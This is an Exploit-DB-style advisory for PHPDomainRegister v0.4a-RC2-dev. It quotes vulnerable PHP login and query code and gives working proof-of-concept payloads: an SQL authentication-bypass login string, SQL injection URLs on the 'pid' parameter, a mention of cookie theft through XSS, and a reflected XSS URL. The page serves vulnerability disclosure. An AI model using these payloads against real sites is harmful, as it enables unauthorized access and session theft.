PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]

vendor:

PHPDomainRegister

by:

Or4nG.M4n

7,5

CVSS

HIGH

SQL Auth Bypass, SQL Injection

89, 79

CWE

Product Name: PHPDomainRegister

Affected Version From: v0.4a-RC2-dev

Affected Version To: v0.4a-RC2-dev

Patch Exists: Unknown

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

Unknown

PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]

PHPDomainRegister v0.4a-RC2-dev contains a vulnerability in the class_AjaxLogin.php file, line 73, where the function is_login() includes the config.php file, line 2, and sets the username session variable, line 4, with the value of the POST username parameter, line 3. This allows an attacker to bypass authentication by setting the username parameter to ' or 1=1 #. Additionally, the index.php file, line 617, contains a SQL injection vulnerability, where the value of the GET pid parameter is used in a SQL query, line 1, without being sanitized. This allows an attacker to inject arbitrary SQL code into the query.

Mitigation:

Input validation should be used to prevent SQL injection attacks. Authentication should be done using a secure method such as hashing or using a secure authentication protocol.

Source

Exploit-DB raw data:

Title    = PHPDomainRegister v0.4a-RC2-dev => [SQL Auth][SQL Inject][XSS]
Author   = Or4nG.M4n
Download = http://garr.dl.sourceforge.net/project/phpdr/v0.4b%20-%20RC2.rar

This Bug Powered By : GooGLe
Thnks :
+----------------------------------+
|   xSs m4n i-Hmx Cyber-Crystal    |
|   Dr.Bnned ahwak2000 sa^Dev!L    |
+----------------------------------+

                                       SQL Auth Bypass
vuln : class_AjaxLogin.php line 73

  function is_login() { <<<<==== 1
        include ('../config.php'); <<<<==== 2
  if(isset($_POST['username']))  { <<<<==== 3
  $_SESSION['username']   = $_POST['username']; <<<<==== 4
		 $password   = $_POST['password']; <<<<==== 5
		 $strSQL     = <<<<==== 6
                     "SELECT 
                                *
                        FROM
                                `".$_SQL_PREFIX . $USER_Table_Name."`
				        WHERE
				                `LOGIN_NAME` = '".$_SESSION['username']."'
				        AND
				                password = md5('".$password."');"; <<<<==== 7

            $result  = mysql_query ($strSQL); <<<<==== 8
			$row     = mysql_fetch_row($result); <<<<==== 9
		    $exist   = count($row); <<<<==== 10
		if($exist >=2) { $this->jscript_location();  } <<<<==== 11
		
		[jscript_location]
		
		  function jscript_location() { <<<<==== 12
            $this->set_session(); <<<<==== 13
        echo "<script> $('#container').fadeOut();window.location.href='".SUCCESS_LOGIN_GOTO."'</script>"; <<<<==== 14
  

How i can Exploit this bug : 
just login as = > admin ' or 1=1 #

                                      SQL injection
vuln
admin/index.php line 212

$sql = "SELECT name, price, disc, disc2, webspace FROM ".$_SQL_PREFIX."packages WHERE `id` = ".$_GET['pid'].";"; <<<<==== 1
$getpack = mysql_query($sql); <<<<==== 2

line 1079

        showPacket($pid); <<<<==== 3
								  
vuln
index.php line 617
 
    $SQL = "SELECT * FROM ".$_SQL_PREFIX."packages where id = ".$_GET['pid'].""; <<<<==== 1
    $result = mysql_query($SQL); <<<<==== 2

Exploit Here :
index.php?usetype=domainauswahl&pid=%injectionhere%&use=Details
admin/index.php?show=showPacket&pid=%injectionhere% Sql to xss to get cookie


	                                 Cross Site Scrpting [xss]
admin/index.php?show=domains&do=delFirmadomains&domain=<script>alert(7);</script>